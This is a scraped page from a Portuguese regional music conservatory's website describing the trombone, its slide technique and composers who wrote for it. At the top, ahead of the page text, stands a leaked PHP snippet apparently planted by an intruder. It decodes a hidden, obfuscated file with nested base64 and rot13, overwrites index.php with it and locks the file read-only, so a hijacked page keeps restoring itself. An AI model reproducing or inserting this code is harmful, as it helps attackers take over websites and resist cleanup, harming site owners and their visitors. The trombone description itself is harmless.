$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Trombone – Conservatório Regional do Baixo Alentejo

Trombone

O Trombone é um instrumento de sopro executado através de um sistema que os músicos designam de bocal. Ao que parece, o antepassado direto do Trombone remonta ao século XV. Para o leigo a sua característica mais curiosa é a interessante técnica de execução do instrumento, baseada no deslizamento contínuo de um pedaço de metal designado de “vara”, técnica esta que permite ao trombonista a produção das diversas notas musicais, sendo bastante característicos os vários efeitos possíveis, nomeadamente o portamento, ou seja, o efeito musical de “deslizamento” contínuo entre uma nota e outra. Inúmeros compositores recorreram a este instrumento ao longo das várias épocas da história da música, nomeadamente Wolfgang Amadeus Mozart (1756 – 1791), Ludwig van Beethoven (1770 – 1827) e Karlheinz Stockhausen (1928 – 2007), entre muitos outros.